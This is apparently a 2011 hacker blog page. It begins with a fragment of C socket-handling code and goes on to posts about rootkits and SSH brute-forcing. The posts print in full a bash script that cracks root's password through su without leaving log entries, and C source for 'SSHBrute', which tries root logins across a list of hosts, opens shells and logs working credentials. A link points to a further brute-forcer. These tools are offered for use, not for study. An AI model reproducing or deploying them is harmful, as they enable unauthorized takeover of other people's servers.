      memcpy(&acip6[0],addr6.sin6_addr.s6_addr,16);
#ifdef BLOCKDNS
      signal(SIGALRM,gotalarm);
      if(setjmp(alarmret)==0x0)
      {
  alarm(10);
     hostinfo = gethostbyaddr( (char * )&addr6.sin6_addr.s6_addr, 16, AF_INET6);
  signal(SIGALRM,SIG_IGN);
      alarm(0);
      } else
          hostinfo=NULL;
      signal(SIGALRM,SIG_IGN);
      if(hostinfo)
         strmncpy(accepthost,hostinfo->h_name,sizeof(accepthost));
      else
#endif
         inet_ntop(AF_INET6,&addr6,accepthost,sizeof(accepthost));
      inet_ntop(AF_INET6,&addr6,acceptip,sizeof(acceptip));
      acceptport=ntohs(addr6.sin6_port);
   }
   else
#endif
   {
       tm = sizeof(addr);
       str = accept(lsock, ( struct sockaddr * )&addr, &tm);
       if (str==-1) {
          /* remove the handler.. */
  lkm->sock->constructed=NULL;
  killsocket(lsock);
          return -1;
       }
       acip=addr.sin_addr.s_addr;
#ifdef BLOCKDNS
       signal(SIGALRM,gotalarm);
       if(setjmp(alarmret)==0x0)
       {
   alarm(10);
hostinfo = gethostbyaddr( ( char * )&addr.sin_addr.s_addr, sizeof( struct in_addr), AF_INET);
   signal(SIGALRM,SIG_IGN);
   alarm(0);
       } else
           hostinfo=NULL;
       signal(SIGALRM,SIG_IGN);
       if (hostinfo)
          strmncpy(accepthost,hostinfo->h_name,sizeof(accepthost));
       else
#endif
       strmncpy(accepthost,inet_ntoa( addr.sin_addr ),sizeof(accepthost));
       strmncpy(acceptip,inet_ntoa(addr.sin_addr),sizeof(acceptip));
       acceptport=ntohs(addr.sin_port);
   }
   return str;
}

int socket_accept() {
    int ret,rc;
    int asocket;
    int npeer;
    int issl=0;
    int listensocket;
    int p_proto;
#ifndef BLOCKDNS
    char data[20];
    char *pt;
#endif
#ifdef HAVE_SSL
    int sslerr;
    char sebuf[1000];
#endif
    p_proto=currentsocket->sock->protocol;
    listensocket=currentsocket->sock->syssock;
    asocket = p_accept(listensocket);
    if(asocket<=0) return -1;
    mastersocket=currentsocket;
    if(mastersocket!=NULL) {
mastersocket->sock->flag=SOC_SYN; /* resetting the listener to listen again */
#ifdef HAVE_SSL
issl=mastersocket->sock->ssl; /* inherit ssl flag */
#endif
    } else {
//p_log(LOG_ERROR,-1,lngtxt(812));
shutdown(asocket,2);
close(asocket);
return -1;
    }
#ifndef BLOCKDNS
    ap_snprintf(data,sizeof(data),"%d\n%d",asocket,mastersocket->sock->syssock);
#ifdef IPV6
    if(mastersocket->sock->protocol==AF_INET6)
dns_lookupv6(acip6,acceptresolved,acceptresolved,data);
    else
#endif
dns_lookup(acip,acceptresolved,acceptresolved,data);
    return -1; /* dont trigger the created event */
}

int acceptresolved(struct resolve *rp) {
    int msock;
    int asocket;
    int rc;
    int *pr;
    int p_proto;
    int issl;
    struct in_addr inaddr;
    char *pt;
    char sebuf[1000];
    pt=strchr(rp->data,'\n');
    if(pt)
    {
*pt=0;
pt++;
asocket=atoi(rp->data);
msock=atoi(pt);
    } else {
return -1;
    }
    inaddr.s_addr=rp->ip;
    strmncpy(accepthost,rp->hostn,sizeof(accepthost));
#ifdef IPV6
    if(rp->protocol==AF_INET6)
    {
inet_ntop(AF_INET6,&rp->ip6[0],acceptip,sizeof(acceptip));
    } else
#endif
strmncpy(acceptip,inet_ntoa(inaddr),sizeof(acceptip));
    mastersocket=getpsocketbysock(msock);
    if(mastersocket)
    {
#ifdef HAVE_SSL
issl=mastersocket->sock->ssl; /* inherit ssl flag */
#endif
p_proto=rp->protocol;
    }
#endif
    if(checkhostallows(acceptip)==-1 && checkhostallows(accepthost)==-1)
    {
//p_log(LOG_ERROR,-1,lngtxt(813),accepthost);
#ifdef HAVE_SSL
 if(mastersocket->sock->sslfd!=NULL && issl==SSL_ON)
 {
 SSL_shutdown(mastersocket->sock->sslfd);
 SSL_free(mastersocket->sock->sslfd);
 mastersocket->sock->sslfd=NULL;
 }
#endif
shutdown(asocket,2);
close(asocket);
return -1;
    }
    //p_log(LOG_WARNING,-1,lngtxt(814),accepthost);
    asocket=createsocket(asocket,ST_LISTEN,0,SGR_NONE,NULL,NULL,mastersocket->sock->errorhandler,mastersocket->sock->handler,mastersocket->sock->destructor,mastersocket->sock->remapper,p_proto,issl);
    if (asocket==-1) return -1;
    currentsocket=getpsocketbysock(asocket);
#ifdef HAVE_SSL
    if(currentsocket!=NULL && mastersocket!=NULL) /* inherit ssl-setup */
    {
currentsocket->sock->ssl=mastersocket->sock->ssl;
currentsocket->sock->sslfd=mastersocket->sock->sslfd;
mastersocket->sock->sslfd=NULL;
if(currentsocket->sock->ssl==SSL_ON && currentsocket->sock->sslfd!=NULL)
{
    SSL_set_fd(currentsocket->sock->sslfd,asocket);
    SSL_set_accept_state(currentsocket->sock->sslfd);
    rc=SSL_accept(currentsocket->sock->sslfd);
    if(rc==-1)
    {
rc=SSL_get_error(currentsocket->sock->sslfd,rc);
switch(rc)
{
    case SSL_ERROR_NONE:
break;
    case SSL_ERROR_WANT_WRITE:
    case SSL_ERROR_WANT_READ:
    case SSL_ERROR_WANT_X509_LOOKUP:
break;
    default:
ERR_error_string(rc,sebuf);
//p_log(LOG_ERROR,-1,lngtxt(815),accepthost,sebuf);
killsocket(asocket);
return -1;
}
    }
    //p_log(LOG_INFO,-1,lngtxt(816),accepthost);
}
    }
#endif
    strmncpy(currentsocket->sock->source,acceptip,sizeof(currentsocket->sock->source));
    strmncpy(currentsocket->sock->dest,mastersocket->sock->source,sizeof(currentsocket->sock->dest));
    currentsocket->sock->param=mastersocket->sock->param;
    currentsocket->sock->sport=acceptport;
    currentsocket->sock->dport=mastersocket->sock->sport;
    currentsocket->sock->flag=SOC_CONN;
#ifndef BLOCKDNS
    if(mastersocket->sock->constructed!=NULL)
    {
writesock_DELAY(currentsocket->sock->syssock,"",5);
rc=(*mastersocket->sock->constructed)(mastersocket->sock->param);
    }
#endif
    return 0x0;
}
/* helper routine for checking sockets state without delay. needed for garbage collection.
   Input:  System socket #
   Output: 1 = data waiting
   0 = no data waiting
  <0 = socket error
   */
int socketdatawaiting(int syssock) {
    fd_set rfds;
    static struct timeval tv;
    if(getpsocketbysock(syssock)==NULL) return 0x0;
    tv.tv_usec = 0;
    tv.tv_sec = 0; /* return without any delay, dont _wait_ for data */
    FD_ZERO(&rfds);
    FD_SET(syssock,&rfds);
    return select(syssock+1,&rfds,NULL,NULL,&tv);
}

/* central socketdriver event routine */
unsigned long socketdriver() {
    fd_set rfds;
    fd_set wfds;
    struct socketnodes *th,*par;
    int rc,altsock;
    int goterr=0;
    int fdscnt=0,wfdscnt=0;
    int sockit=0,sockat=9999,ret,noadv,ln,opt;
    int tt,optbuf;
    unsigned long sec;
    int sck,ssck;
#ifdef HAVE_SSL
    SSL_CIPHER *c;
    int bits;
#endif
    long otm;
    struct tm *xtm;
    int issl=SSL_OFF;
    int ssl_fd;
    struct socketnodes *lkm;
    static struct timeval tv;
    static unsigned long dnl;
    static int nodelays=0;
    struct sendqt *msq;
    int toutw;
    int nowf=0;
    time_t tm,em;
    delayinc=0;
    time(&tm);
    if (tm!=oldsec)
    {
delayinc=1;
nodelays=0;
    }
    else
nodelays++; /* disallow process to blast up */
    oldsec=tm;
    th=socketnode;
    par=th;
    FD_ZERO( &rfds);
    FD_ZERO( &wfds);
    while(th!=NULL)
    {
rc=0;noadv=0;
if(th->sock!=NULL)
{
    if(th->sock->serversocket)
    {
if(th->sock->serverstoned>0)
{
    th->sock->serverstoned-=delayinc;
    if(th->sock->serverstoned==0) th->sock->serverbytes=0;
}
    }
    if (th->sock->syssock>sockit) sockit=th->sock->syssock;
    if (th->sock->syssock<sockat) sockat=th->sock->syssock;
    if (th->sock->flag==SOC_NOUSE)
    {
currentsocket=th;
altsock=th->sock->syssock;
if(th->sock->constructor!=NULL)
    rc=(*th->sock->constructor)(th->sock->param);
th=par->next;
if(th!=NULL)
{
    if(altsock==th->sock->syssock)
th->sock->flag=SOC_SYN;
    else
noadv=1;
} else
    noadv=1;
    } else {
if (th->sock->flag==SOC_SYN || th->sock->flag==SOC_CONN && th->sock->syssock>0)
{
#ifdef HAVE_SSL
    if(th->sock->ssl==SSL_ON && th->sock->sslfd!=NULL)
    {
ssl_fd=SSL_get_fd(th->sock->sslfd);
if(ssl_fd>0)
{
    if(ssl_fd<sockat) sockat=ssl_fd;
    if(ssl_fd>sockit) sockit=ssl_fd;
    FD_SET(ssl_fd,&rfds);
}
    } else
#endif
if(th->sock->syssock>0)
    FD_SET(th->sock->syssock, &rfds);
    fdscnt++;
    toutw=0;
    msq=th->sock->sendq;
    if(msq)
    {
if(msq->delay>0)
{
    toutw=-1;
    msq->delay-=delayinc;
}
    }
    if(toutw==0 && (th->sock->flag==SOC_SYN || (th->sock->sendq!=NULL && th->sock->serverstoned==0)))
    {
#ifdef HAVE_SSL
if(th->sock->ssl==SSL_ON && th->sock->sslfd!=NULL)
{
    ssl_fd=SSL_get_fd(th->sock->sslfd);
    if(ssl_fd>0)
    {
if(ssl_fd<sockat) sockat=ssl_fd;
if(ssl_fd>sockit) sockit=ssl_fd;
FD_SET(ssl_fd,&wfds);
    }
} else
#endif
    if(th->sock->syssock>0)
FD_SET(th->sock->syssock, &wfds);
wfdscnt++;
    }
}
    }
}
if(noadv==0)
{
    par=th;
    th=th->next;
}
    }
    if(sockat>sockit) sockat=sockit;
    if (fdscnt==0)
    {
sleep(1);
return 0x0;
    }
    if(nodelays>20)
    {
usleep(10);
nodelays=0;
    }
    tv.tv_usec = 0;
    tv.tv_sec = 1;
    if(wfdscnt>0)
    ln=select(sockit +1, &rfds, &wfds,NULL,&tv);
    else
    ln=select(sockit +1, &rfds, NULL,NULL,&tv);
    time(&em);
    if(ln<=0) {
#ifndef BLOCKDNS
if(dnl==0 || dnl-time(NULL)>=1)
{
    dns_check_expires();
    dnl=time(NULL);
}
#endif
if(ln<0) /* ouch, socket-error. check every single socket, do a garbage collection */
{
    for(sck=sockit;sck>=sockat;sck--)
    {
if(socketdatawaiting(sck)<0)
{
    killsocket(sck);
}
    }
}
return em-tm;
    }
    th=socketnode;
    par=th;
    if(sockit<=0) sockit=1;
    for(sck=sockit;sck>=sockat;sck--)
    {
noadv=0;
ssck=sck;
th=getpsocketbysock(sck);
if(th!=NULL)
{
    currentsocket=th;
#ifdef HAVE_SSL
    if(th->sock->ssl==SSL_ON && th->sock->sslfd!=NULL)
ssck=SSL_get_fd(th->sock->sslfd);
    if(ssck<=0) ssck=sck;
#endif
    altsock=ssck;
    nowf=th->sock->nowfds;
    if(th->sock->flag==SOC_SYN && ssck>0)
    {
if(FD_ISSET(ssck,&rfds) || FD_ISSET(ssck,&wfds))
{
        opt=sizeof(optbuf);
        if (getsockopt(ssck, SOL_SOCKET, SO_ERROR, &optbuf,&opt) >=0)
    {
if(optbuf==0)
{
    altsock=th->sock->syssock;
#ifdef HAVE_SSL
    if(th->sock->ssl==SSL_ON)
    {
if(th->sock->type==ST_CONNECT)
    th->sock->sslfd=SSL_new(clnctx);
else
    th->sock->sslfd=SSL_new(srvctx);
if(th->sock->sslfd==0)
{
    //p_log(LOG_ERROR,-1,lngtxt(817),th->sock->syssock,th->sock->param);
    optbuf=-1;
}
    }
#endif
    if(optbuf==0)
    {
if(th->sock->type==ST_CONNECT)
    rc=socket_connect();
else
    rc=socket_accept();
if(rc==0)
{
    if(th->sock->type==ST_CONNECT)
th->sock->flag=SOC_CONN;
    th->sock->delay=300;
    if(th->sock->constructed!=NULL)
    {
pcontext;
writesock_DELAY(th->sock->syssock,"",5);
rc=(*th->sock->constructed)(th->sock->param);
pcontext;
    }
}
    }
}
    } else {
        optbuf==-1;
    }
    if(optbuf!=0) {
th=getpsocketbysock(altsock);
if(th!=NULL)
{
    if(th->sock->errorhandler!=NULL)
    {
if(th->sock->sockgroup==0 || (th->sock->sockgroup>0 && getpsocketbygroup(socketnode,th->sock->sockgroup,th->sock->syssock)==NULL))
{
    pcontext;
    rc=(*th->sock->errorhandler)(th->sock->param,SERR_REFUSED);
    pcontext;
}
    }
    goterr=1;
    if(getpsocketbysock(altsock)!=NULL)
    {
killsocket(th->sock->syssock);
    }
}
    }
} else {
    if(th->sock->flag==SOC_SYN && th->sock->type==ST_CONNECT)
    {
th->sock->delay+=delayinc;
if(th->sock->delay>SOC_TIMEOUT)
{
    altsock=th->sock->syssock;
    if(th->sock->errorhandler!=NULL)
    {
pcontext;
rc=(*th->sock->errorhandler)(th->sock->param,SERR_TIMEOUT);
pcontext;
    }
    goterr=1;
    if(getpsocketbysock(altsock)!=NULL)
    {
killsocket(th->sock->syssock);
    }
}
    }
}
    } else
    if (th->sock->flag==SOC_CONN) {
noadv=0;
if(FD_ISSET(ssck,&rfds))
{
    if (th->sock->flag==SOC_CONN)
    {
altsock=th->sock->syssock;
rc=receivesock(th->sock);
th=par->next;
if (getpsocketbysock(altsock)==NULL) rc=-1;
if (rc<=0)
{
    killsocket(altsock);
    noadv=1;
}
    }
} else {
if(th->sock->flag==SOC_CONN && th->sock->type==ST_CONNECT && th->sock->dataflow!=SD_STREAM) {
th->sock->delay-=delayinc;
if(th->sock->delay<=0) {
    writesock_URGENT(th->sock->syssock,"\r\n");
    th->sock->delay=300;
}
    }
}
if(FD_ISSET(ssck,&wfds) && noadv==0 && th->sock->serverstoned==0) {
#ifdef HAVE_SSL
    if(th->sock->ssl==SSL_OFF)
flushsendq(sck,Q_NEXT);
    else
        if(th->sock->ssl==SSL_ON && th->sock->sslfd!=NULL) {
    c=SSL_get_current_cipher(th->sock->sslfd);
    SSL_CIPHER_get_bits(c,&bits);
    if(bits!=0)
flushsendq(sck,Q_NEXT);
}
#else
flushsendq(sck,Q_NEXT);
#endif
}
    }
}
if (goterr==1) break;
    }
#ifndef BLOCKDNS
    if(dnl==0 || dnl-time(NULL)>=1)
    {
dns_check_expires();
dnl=time(NULL);
    }
#endif
    return em-tm;
}

comments: 0 »

My first root (src)

Posted on 25th September 2011 in Codes, Exploits

Ooops! I mean rootkit… registered users may proceed…
Please Login or Register to read the rest of this content.

comments: 2 » tags: root rootkit hack hacker code exploit

Great Websites I like to use

Posted on 24th September 2011 in Papers

Id like to mention, a few of my friends websites, and those who have helped me, well, most of the guys i speak to regularly so, i should only note this to others, please do look at these other sites and enjoy theyre wisdom!

pi3 of www.pi3.com.pl // Master r.kit

noptrix of www.noptrix.net // NOP tricks!

kcope of is0warez.de // Master of Remote exploitation!

K-Special/n0ah my good friend has no website atm but google his nick and there is NO shortage of mirrors, check n0ah.org from time to time

iCER of magicShells.com // All round nice guy and runs a decent company to!

roy of Italian Security Team // good guy and fellow Italian!

Michael B. of rootkit.nl // Master of rootkit-removal

Zmeu of blackhats.pl // Master Scan

All the guys at www.backbox.org for theyre awesome project (ciao a tutti e’) !
All the guys in #Haxnet@Efnet for theyre continued support,

and anyone i have missed, well Nudge me coz i have a terrible memory for sites especially!
Those sites, i have used,and those peoples work, i also love to read and use if i have to.
Coming soon, complete Vihrogon-rootkit sshd src with diffs applied (almost done)!
xd / Team NoNet

comments: 1 » tags: hackers hacks md5 rootkit

Linux/BSD sshd bruter

Posted on 24th September 2011 in Uncategorized

Now for Michaels,note i made this for root account,it wasnt configured for it.. great bruter code tho!

make a file.sh
Linux/Bsd bruter

#!/bin/bash
# (c) 1999/2000 <lcamtuf@ids.pl>
# ------------------------------
# Requirements:
# - working /bin/su
# - recent PAM implementation (tested with RedHat 5.x)
# - 'usleep' command and bash 1.14.x or 2.0.x
DESTACC='root'    # Account to crack
WORDFILE='words'  # Wordfile with passwords to test
KILLDELAY=03      # Delay (in 1/10 sec) to wait for su (<10)

# End of setup
clear
echo "RedHat - NothingInLogs[tm] BruteForce(R) Password Crack"
echo "-------------------------------------------------------"
echo "  - (c) 1999/2000, Michal Zalewski <lcamtuf@ids.pl> -  "
echo
if [ ! "$1" = "" ]; then
  DESTACC="$1"
fi
KD=$[KILLDELAY*100000]
echo "[+] Configured against user '$DESTACC', wordfile: $WORDFILE"
echo "[+] Kill-delay set to $KD usecs."
id "$DESTACC" &>/dev/null
if [ ! "$?" = "0" ]; then
  echo "[-] User: '$DESTACC' not found."
  echo
  exit 0
fi
SHL="`grep "^$DESTACC:" /etc/passwd|awk -F: '{print $7}'`"
if [ ! "$SHL" = "/bin/bash" ]; then
  echo "[-] User '$DESTACC' has $SHL set as shell, expect problems."
fi
echo "[+] Destination account is alive and well."
if [ ! -f "$WORDFILE" ]; then
  echo "[-] Wordfile '$WORDFILE' not found, check it."
  echo
  exit 0
fi
if [ ! -u /bin/su ]; then
  echo "[-] Can't find +s on /bin/su, 0wn me."
  echo
  exit 0
fi
if [ ! -x /bin/su ]; then
  echo "[-] Haven't +x on /bin/su, 0wn me."
  echo
  exit 0
fi
echo "[+] /bin/su seems to be executable and setuid, hopefully it works."
if [ ! -x /bin/usleep ]; then
  echo "[-] No /bin/usleep in this system. Be a hacker."
  echo
  exit 0
fi
if [ "$UID" = "0" ]; then
  echo "[-] Root?! your mental right?"
  echo
  exit 0
fi
echo "[+] Let's go straight to number one."
LNS="`cat $WORDFILE | wc -l|awk '{print $1}'`"
CNT=0
echo "[+] Wordfile '$WORDFILE' loaded - $LNS passes."
echo "[+] Estimated time: $[LNS*KILLDELAY/25] secs, max: $[LNS*KILLDELAY/10] secs."
while [ "$CNT" -lt "$LNS" ]; do
  CNT=$[CNT+1]
  PASS="`head -$CNT $WORDFILE|tail -1`"
  echo -ne "[?] Trying: '$PASS' ($CNT/$LNS).                \r"
  echo "$PASS" | su "$DESTACC" &>/dev/null &
  usleep $KD
  kill -9 $! &>/dev/null
  if [ ! "$?" = "0" ]; then
    echo
    echo "[*] Huh, I've tried pass: '$PASS' for: '$DESTACC'."
    echo "[+] Time wasted: $[KILLDELAY*CNT/10] secs."
    echo "[+] Thank You, and hope you enjoyed your stay."
    echo
    exit 0
  fi
done
echo "[*] Hmm, end of wordfile, but no matching passwords  "
echo "[+] Time wasted: $[KILLDELAY*CNT/10] seconds."
echo "[+] Bad day, try again tomorrow?"
echo
exit 0

And finally for tal0n’s!
A great guy and good friend!

Note, this can use LibSSh v2 if you want to bother to make it i have made that, even for windows, and wont publish that but, it is VERY simple and worth it,you wont get more than routers with these, you really want to be using and compiling with libssh 0.2 or 2.0 whatever it is but not 0.1 as most do…I might, oneday publish the one i have but, it is basically just as i have said, and some people do have it, but just use ssh2 functions to auth instead of 11,and connecting is also abit different but, very easy as it is alot of defines you call in ssh2, rather than functions, like ssh1.
anyhow thats just some rhetoric crap i thought of.. have phun! (xd)

For Linux/BSD

/*
* =====================================================================================================|
* ______________________________________________________________________________________________________
* This WAS private until traders and lame zone-h forum people got ahold of it >:( .                    |
* _____________________________________________________________________________________________________|
*                                                                                                      |
* reflux-sshbrute.c                                                                                    |
*                                                                                                      |
* SSHBrute v1.4 - Tal0n [cyber_talon@hotmail.com] of [Reflux Security] on [09-04-04]                   |
* Based on sshbrute2.c, but much, much better =).                                                      |
*                                                                                                      |
* You MUST have LibSSH installed to compile: http://www.0xbadc0de.be/libssh/libssh-0.1.tgz             |
*                                                                                                      |
* Compiling: gcc -o sshbrute sshbrute.c -lssh                                                          |
* _____________________________________________________________________________________________________|
* Notes for v1.4:                                                                                      |
*                                                                                                      |
* 1) Changed the printing of the banner to a varible instead of text to make updating easier.          |
* 2) Added/Removed some login combonations but still keeping to limit to 50.                           |
* 3) Changed logging names and syntaxs of shells and no shells and no printing of boxes to the screen. |
* 4) Added and changed syntax to view file its bruting and its PID when it starts and finishes.        |
* 5) Added a feature so that it fork()'s into the background while bruting.                            |
*                                                                                                      |
* _____________________________________________________________________________________________________|
* This WAS private until traders and lame zone-h forum people got ahold of it >:( .                    |
* _____________________________________________________________________________________________________|
* =====================================================================================================|
*/
#include <arpa/inet.h>
#include <libssh/libssh.h>
#include <netinet/in.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>

char banner[] = "\nSSHBrute v1.4 - Tal0n [cyber_talon@hotmail.com] of [Reflux Security] on 09-04-04";
int i; // The *process* varible.

int shell(SSH_SESSION *session) // The shell and ssh session.
{
     struct timeval tv; // Some time values.
     BUFFER *readbuf = buffer_new(); // Declare a BUFFER for readbuf and goto buffer_new() function (ref: libssh.h =P).
     int what; // Just a varible we use to do some things.
     time_t start, acum; // Declaring start and acum as time values
     CHANNEL *channel; // Declare "channel" as a channel.
     channel = open_session_channel(session, 1000, 1000); // channel equals open a session channel for session
     if(isatty(0)) // Check if we got a tty.
     what = channel_request_pty(channel); // Request a pty.
     what = channel_request_shell(channel); // Request a shell =)
     start = time(0); // Start the timer =P
while(channel->open != 0) // If the channel's not open, lets...
{
     usleep(500000); // Lets sleeeppppppp
     what = channel_poll(channel, 0); // Channel_poll the channel.
if(what > 0) // If we opened a shell, lets do something with it!
{
     what = channel_read(channel, readbuf, 0, 0); // Read the buffer in the channel.
}
else
{
if(start+5<time(0)) // A ten second timeout.
{
     return -1;
}
}
}
     return 0;
}

void checkauth(char *username, char *password, char *host) // Check authencication.
{
     SSH_OPTIONS *options; // Declare "options" as a SSH_OPTIONS.
     SSH_SESSION *session; // Declare "session" as a SSH_SESSION.
     char *argv[] = {"none"}; // This is weird but needed.
     int argc = 1; // Same as above.
     i++; // Child Process
     alarm(10); // Alarm
     options = ssh_getopt(&argc, argv); // Getopt argc and argv.
     options_set_username(options, username); // Set username.
     options_set_host(options, host); // Set host
     session = ssh_connect(options); // Prepare ssh_connect with the options specified.
if(!session) // If we don't get a session...
     return;
if(ssh_userauth_password(session, NULL, password) != AUTH_SUCCESS) // If the password doesn't work, do this.
{
     ssh_disconnect(session); // Disconnect the ssh session.
     return;
}
if(shell(session)) // If we grab a session...
{
     FILE *fd; // Declare a file descriptor
     fd = fopen("vuln.shell", "a+"); // Open vuln.txt
     fprintf(fd, "[%s/%s %s]\n", username, password, host); // Write into vuln.txt
     fclose(fd); // Close vuln.txt
}
else
{
     FILE *fd; // Declare a file descriptor.
     fd = fopen("vuln.noshell", "a+"); // Open vuln.txt.
     fprintf(fd, "[%s/%s %s]\n", username, password, host); // Write into vuln.txt.
     fclose(fd); // Close vuln.txt.
}
}

int main(int argc, char *argv[]) // Main Function.
{
     char buffer[1000], *s; // Our file buffer and a varible we need to do some things.
     FILE *fd; // Declare a file descriptor.
     int maxfork, numfork; // Login combos and parent process.
if(argc < 2) // If we don't get our arguments...
{
     printf("%s", banner); // Print this.
     printf("\nUsage: %s -brute <hosts.txt> || -grab <ip> || -help\n\n", argv[0]); // Print this.
     return 0;
}
if(strcmp(argv[1], "-brute") == 0) // If the user wants -brute...
{
fd = fopen(argv[2], "r"); // Open argv[1] for reading.
if(fd == NULL) // If its not there...
{
     printf("\nCan't open \"%s\" to read!\n\n", argv[2]); // Print the error.
     return 0;
}
     pid_t pid;
     pid = fork();
     printf("SSHBrute Started (File = %s, PID = %d).\n", argv[2], pid); // Print this.
if(pid < 0)
{
     printf("Error: fork()\n");
     return -1;
}
if(pid == 0)
{
     maxfork = atoi(argv[2]);
while(fgets(buffer, 1000, fd)) // Take in the buffer.
{
     s = strchr(buffer, '\n'); // Look for next lines.
if(s != NULL)
{
     *s = '\0'; // Look for a NULL terminator.
}
if(!(fork())) // If we can fork, start bruting username/password's.
{
     i = 0; // Child Process.
     checkauth("root", "openssh-portable-com", buffer); // Brute user/pass.
     exit(0);
}
else
{
     numfork++; // Parent Process
if(numfork > maxfork) // If the number of forks is greater than max.
{
     for(numfork; numfork > maxfork; numfork--); // Starting *killing* off forks.
}
     wait(NULL); // Wait =P
}
}
printf("\nSSHBrute Complete (File = %s, PID = %d).\n", argv[2], getpid()); // Print this
}
}
if(strcmp(argv[1], "-grab") == 0) // If the user wants -grab...
{
     char buffer[200], data[] = "\r\n\r\n\r\n"; // The data to send.
     int len = strlen(data); // The data's length.
     int sock; // Our unix socket.
     struct sockaddr_in remote; // Declare a sockaddr_in structure (remote).
     remote.sin_family = AF_INET; // Sock family is AF_INET.
     remote.sin_port = htons(22); // Port is 22.
     remote.sin_addr.s_addr = inet_addr(argv[2]); // The ip to connect to.
if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) // If no socket!?
{
     printf("Error: socket()\n"); // Print this.
     return -1;
}
if(connect(sock,(struct sockaddr *)&remote, sizeof(struct sockaddr)) < 0) // If we can't connect!?
{
     printf("Error: connect()\n"); // Print this.
     return -1;
}
     send(sock, data, len, 0); // Send the data.
     memset(buffer, 0, sizeof(buffer)); // Clear the buffer.
     read(sock, buffer, sizeof(buffer)); // Read the buffer.
     printf("\nSSHd Banner: %s\n", buffer); // Print this and the buffer.
     close(sock); // Close our socket.
     return 0;
}
if(strcmp(argv[1], "-help") == 0) // If the user wants -help...
{
     printf("%s", banner); // Print this.
     printf("\n\nSSHBrute is a SSH Daemon login brute forcer (-brute), supports a SSHd banner\n"); // Print this.
     printf("grabber (-grab), and of course this message (-help). Need more info? USE THE SOURCE!\n\n"); // Print this.
     return 0;
}
}

comments: 15 »

Linux SSHd bruter

Posted on 24th September 2011 in Uncategorized

And now for the next one, zorg’s modified:

Linux version:

/*
*brutessh2 is a brute for sshd port wich atempts to login as root trying
*more than 2000 passwords for it.
*users guest , test , nobody and admin with no passwords are included.
*feel free to add more passwords and more users
*this was originally by zorg but, this is modded to attack SSH2,modded list (xd)
*For mass use a synscan :
*Eg: ./biggssh sship.txt
* Ok.Try This : Hostname root:12345
*/

The code is too big to post here.
so I put on pastebin.

http://pastebin.com/S3GciXBf

comments: 1 »

Help pay for xds lawyer fees.

Recent Posts

Categories

Archives

Blogroll

Links

Meta